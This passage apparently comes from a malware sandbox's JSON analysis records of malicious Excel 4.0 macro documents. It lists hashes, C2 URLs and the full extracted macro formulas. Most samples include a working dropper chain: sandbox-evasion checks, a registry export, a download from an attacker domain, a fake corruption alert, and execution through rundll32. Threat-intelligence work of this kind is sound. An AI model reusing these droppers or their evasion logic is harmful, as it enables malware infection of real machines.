Macro","attr":{"formulas":"WORKBOOK.HIDE(\"4Ojft7eH63\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8105a0d3b8870184f9d4962d8f5e0ecadd2a5dadd7fac18a749b4531caf74f7f"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"8105a0d3b8870184f9d4962d8f5e0ecadd2a5dadd7fac18a749b4531caf74f7f","filesize":147968,"md5":"f2343a9139ba53d27e3c9c595e292c2d","sha1":"378b060b016513601027fc8870bc317357e34496","sha256":"8105a0d3b8870184f9d4962d8f5e0ecadd2a5dadd7fac18a749b4531caf74f7f","sha512":"3bfffce077de8ed01dd832699e2b8bba1b3b202e99bd6d2412db6b3fadbb22a3b044595fccd531b22f947a58f031109d4466fd5385c13142ec59d79000bb6185","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8105a0d3b8870184f9d4962d8f5e0ecadd2a5dadd7fac18a749b4531caf74f7f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"q2v3Mdyea3\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"812797d37579d3d6401606ac1802c10b22f169091ac75b86d514ecb0313f0c38"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"812797d37579d3d6401606ac1802c10b22f169091ac75b86d514ecb0313f0c38","filesize":147968,"md5":"2ec8032f3dbef7f36f343774b2228741","sha1":"8d280f179bccf9a281ab37f22b9890891b8416b2","sha256":"812797d37579d3d6401606ac1802c10b22f169091ac75b86d514ecb0313f0c38","sha512":"23b4268b48b7bcca049b05b37b6b108c4cef9a88725cb07d31bc597e741aa2218852ec01b2bd95b8a549f96ebc6bf047661763fe4d0accabf256f489ea705011","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"812797d37579d3d6401606ac1802c10b22f169091ac75b86d514ecb0313f0c38.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://hxzfvomd.buzz/asf2f1ff"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$1C$0\u003c770,CLOSE(FALSE),)\nIF(R$2C$0\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nGET.WORKSPACE(26)\nRETURN()\nRETURN()\nRETURN()\nGOTO(R$0C$2)\nRETURN()\nWORKBOOK.HIDE(\"afcL9OPgwr\",TRUE)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"81288b943ede134ef60b76eb308bf81b2b28607d674abccdeaaa4d42d117f1ab"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"81288b943ede134ef60b76eb308bf81b2b28607d674abccdeaaa4d42d117f1ab","filesize":206336,"md5":"c92a1dd41519d2d145a02bd0240a6c32","sha1":"3471435080b50597c1773fac2cb5731a5f396155","sha256":"81288b943ede134ef60b76eb308bf81b2b28607d674abccdeaaa4d42d117f1ab","sha512":"87bbefaf8e62e3a098c15b972cb8cd36f6d6497180a21661004a9707e7eb5303a34a500d0f1b49f610f103bb1a31561f7801c59f9b9b85d586cb050e177a8981","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"81288b943ede134ef60b76eb308bf81b2b28607d674abccdeaaa4d42d117f1ab.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"IPInrhdJNw\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8139df8823712c6318b2b9baff7d733468563e7b4a79862b1ca6ab0da3e1941b"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"8139df8823712c6318b2b9baff7d733468563e7b4a79862b1ca6ab0da3e1941b","filesize":112640,"md5":"d7cc8092be86563e8d77f379d9a78f8a","sha1":"f11ccc8b71aa5935aa643e5b84d73d38a1df9cd2","sha256":"8139df8823712c6318b2b9baff7d733468563e7b4a79862b1ca6ab0da3e1941b","sha512":"2b96792e4d6da5d36b4889b8188c11f947e1580dabc84ca2561942bc7b200b69cbe6bd82092b9a52ccf80bbf2013a33db52d293a5c73b0a4e2ca9981643baf5c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8139df8823712c6318b2b9baff7d733468563e7b4a79862b1ca6ab0da3e1941b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KJSDBViad7"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"813a8dde4e8b3876e01b1a3eb010ec9e14603dc841146723c3e1318075d7e3a2"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"813a8dde4e8b3876e01b1a3eb010ec9e14603dc841146723c3e1318075d7e3a2","filesize":209408,"md5":"2e573da979b0b2d0928e36e5fd2f9072","sha1":"1ca03e08f9c0f79f76ace4dfed58152b1d3d65d2","sha256":"813a8dde4e8b3876e01b1a3eb010ec9e14603dc841146723c3e1318075d7e3a2","sha512":"cc42515202b0e6ce2264a05c6d8bb6f70d67e99138e8d379df3219fb67409c0c8a1f28b19b409975fe7549f69a566d797e407f974e319ea25dba3356ba51fa2f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"813a8dde4e8b3876e01b1a3eb010ec9e14603dc841146723c3e1318075d7e3a2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://paxtontranter.xyz/rv24t2"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://paxtontranter.xyz/rv24t2\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ksFp29aMsq\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8154be295fcb465ca994f6a8c8b6b17018628c4e722d692a65052e5412763500"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"8154be295fcb465ca994f6a8c8b6b17018628c4e722d692a65052e5412763500","filesize":152576,"md5":"c3a54f1ebe3aa7f95f4a18d4727f0ce6","sha1":"78879fdefa41097c18d112c125b506e04b5bbc6f","sha256":"8154be295fcb465ca994f6a8c8b6b17018628c4e722d692a65052e5412763500","sha512":"4e3e21fbcb23408afc6cea68edc99811068916f35a6d2b9e7026eeeca6ab449b2e018735cdc582fc51b190e4fcf4b5aa253e168a3c685728bd128486f575b745","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8154be295fcb465ca994f6a8c8b6b17018628c4e722d692a65052e5412763500.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"wIakiIHBPX\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8167122a080b9f7e1c11b6c3f7e26297bcb63fcbfd772ccf78210a3943f852bc"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"8167122a080b9f7e1c11b6c3f7e26297bcb63fcbfd772ccf78210a3943f852bc","filesize":209920,"md5":"0dc576c98c9c365aaf06854598fa1f4c","sha1":"9ec714b5b3e235970f953d40d9e9124b9f299cac","sha256":"8167122a080b9f7e1c11b6c3f7e26297bcb63fcbfd772ccf78210a3943f852bc","sha512":"f4d605cc0be6d1cc152adfe5b8f0e0ae3b5cc287f75ceb6691c20c6ed39553089522d02f2bfd5568ee71aa8dde6daa69d394754ef08ab9113319a08dde3b8678","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8167122a080b9f7e1c11b6c3f7e26297bcb63fcbfd772ccf78210a3943f852bc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["http://fcowhcwsb.space/erg4ewr1"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"http://fcowhcwsb.space/erg4ewr1\",\"c:\\Users\\Public\\b7gf5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\b7gf5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MHWblAFKnj\",TRUE)\nGOTO(R$0C$16)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8168c8890ffda5de5c3cb4d7abb7560dadea9aea705c19561bab421e0f5e21fa"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"8168c8890ffda5de5c3cb4d7abb7560dadea9aea705c19561bab421e0f5e21fa","filesize":206336,"md5":"def7c143cc51834a0420620252288d22","sha1":"59c60ffbc18ac58eda77595a78643834a732ed8d","sha256":"8168c8890ffda5de5c3cb4d7abb7560dadea9aea705c19561bab421e0f5e21fa","sha512":"6929f6ad193d2a864b175b940c280ecaf3b2b545a5a6ae2ec0c954773232c7b9ea8caa0b66fc46674aef7390acd2af2d348b7b8d08a365a59d6d98a67298a73a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8168c8890ffda5de5c3cb4d7abb7560dadea9aea705c19561bab421e0f5e21fa.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Mp18Zy0tcF\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8175ec80757b0e4e4c4c6c026c90fdc82efad16c1e2e48a060da0d4002175e9f"},"analysis":{"reported":"2020-04-09T16:17:20Z","score":10},"files":[{"filename":"8175ec80757b0e4e4c4c6c026c90fdc82efad16c1e2e48a060da0d4002175e9f","filesize":144384,"md5":"1c8ee9ad564e7909547d65dc9670a7a2","sha1":"b2500e7a31bb12c8066d94a951b1b0ff45eb76a5","sha256":"8175ec80757b0e4e4c4c6c026c90fdc82efad16c1e2e48a060da0d4002175e9f","sha512":"747c418c4802d0cde7fa34ad551c494d0f015471ecdaa39c8beac323fa611dc2079d0b7e1e4513d3450ef8ada47b8912753c6bf8ad788de75f06dbae3db38bba","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8175ec80757b0e4e4c4c6c026c90fdc82efad16c1e2e48a060da0d4002175e9f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"q19ZNu8IQX\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"8183c28810451ee36596777396eda027d7c1952c96732e7e3c918b650120b32c"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"8183c28810451ee36596777396eda027d7c1952c96732e7e3c918b650120b32c","filesize":185344,"md5":"421cfb69cad5a0317135c5603a4f41ce","sha1":"2192bc750a910da69b08a5b91a5bd9fe4bba5d63","sha256":"8183c28810451ee36596777396eda027d7c1952c96732e7e3c918b650120b32c","sha512":"d58590f2473a75e40b4bf4a483649cb2d4a510672a5afa2505b706b28da688c8d24a89491d3c4cff01c847b40d2e2d931e49558979def26cd963c9a00e5633db","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"8183c28810451ee36596777396eda027d7c1952c96732e7e3c918b650120b32c.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"81917e596a23a499e88590a21c1a994038fcb27734a139c937da8e0bbf8c627b"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"81917e596a23a499e88590a21c1a994038fcb27734a139c937da8e0bbf8c627b","filesize":171008,"md5":"e07460072fdc164552ecc5173c2f1d08","sha1":"1941d4c7cfeec6f2eaa7ae201a2243edaddafcb0","sha256":"81917e596a23a499e88590a21c1a994038fcb27734a139c937da8e0bbf8c627b","sha512":"193010b26df77c553cc0b1f61d0df87955f4b1c1f92c9a545d4f820f7482a0866089892f7b739b99e61fa103a2b4115f391a5f5661546e4f4be5c3ac46702b86","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"81917e596a23a499e88590a21c1a994038fcb27734a139c937da8e0bbf8c627b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ethelenecrace.xyz/fbb3"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ethelenecrace.xyz/fbb3\",\"c:\\Users\\Public\\bmjn5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bmjn5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"HdfR0dM1fE\",TRUE)\nGOTO(R$1C$10)\nCALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\nFOPEN(\"c:\\users\\public\\1.reg\")\nFPOS(FOPEN(\"c:\\users\\public\\1.reg\"),215)\nFILE.DELETE(\"c:\\users\\public\\1.reg\")"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"819f88bf9c77dd5f106c363e3a8ce9bb19708f109bc8ca66caa15f5ab55d0001"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"819f88bf9c77dd5f106c363e3a8ce9bb19708f109bc8ca66caa15f5ab55d0001","filesize":109568,"md5":"c78a9f9d5c70e7fb6e674e893ce1833b","sha1":"f1f398715533d4b5d8da30ef3457f89f07aa7fab","sha256":"819f88bf9c77dd5f106c363e3a8ce9bb19708f109bc8ca66caa15f5ab55d0001","sha512":"063ed6a2339859f1b5621315e8cac930c18e0d04687b742f06a966a50537c31de2b627af3a275747556a2e9f1ca546148c955b28f6973839ae0ed1cc5ce2b04c","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"819f88bf9c77dd5f106c363e3a8ce9bb19708f109bc8ca66caa15f5ab55d0001.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"0Jal7qzuFE\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"81a2e863b1c0a0d767152f1923688d820d004e6101079a6b719bfdabc54218dc"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"81a2e863b1c0a0d767152f1923688d820d004e6101079a6b719bfdabc54218dc","filesize":160768,"md5":"31a3eb4021be76e75128568f2f825301","sha1":"2c97f3ce53803f19906e6f20dc7e8defcebdc16a","sha256":"81a2e863b1c0a0d767152f1923688d820d004e6101079a6b719bfdabc54218dc","sha512":"ac64a3d0941f457073af2e3f3d89cccbe0e0a68540f8e3815094a4fb45fd2fde3c99b8907544a26ac65309ca8ba5660222ba72cb403945d2da57f52038b9cb83","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"81a2e863b1c0a0d767152f1923688d820d004e6101079a6b719bfdabc54218dc.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"DRfHYyXwU3\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"81baa9f1cf5b4200b2f5724adc0786a062985064da89125321722cf08ee9fc73"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"81baa9f1cf5b4200b2f5724adc0786a062985064da89125321722cf08ee9fc73","filesize":206336,"md5":"f74b91425563d6cc9c804b09c07a443c","sha1":"a4ac32689ab83d5c9a513f646ec7f2d99f98d5de","sha256":"81baa9f1cf5b4200b2f5724adc0786a062985064da89125321722cf08ee9fc73","sha512":"a9c5f4290954cecad30a3dc7b5d734a70c2c2bf1644dd5506f669e6174e44f74662f265af11fe799582dc32fab9ca3c8aaf4219c7bbdb9b903865a2b7e92bb97","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"81baa9f1cf5b4200b2f5724adc0786a062985064da89125321722cf08ee9fc73.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"198y0M7YBK\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"81db89bcaffd94f41e1dd9d31a2c9f4bf0128262c52bb773c32ad9611a518af7"},"analysis":{"reported":"2020-04-09T16:17:21Z","score":10},"files":[{"filename":"81db89bcaffd94f41e1dd9d31a2c9f4bf0128262c52bb773c32ad9611a518af7","filesize":167936,"md5":"f1bda06b52bd47d7b3bcfba4d91f7161","sha1":"bde7d7caf7f1f21e13d8df6120e968cc5d1cf18f","sha256":"81db89bcaffd94f41e1dd9d31a2c9f4bf0128262c52bb773c32ad9611a518af7","sha512":"30e8bbc77829cecd336c8bc523a2b7a9b1c157eb8e86303375b5fc50d7767bd1eb73e60350041d0fbf03527470407e781a48c93b84206030857f946d154dcfcb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"81db89bcaffd94f41e1dd9d31a2c9f4bf0128262c52bb773c32ad9611a518af7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 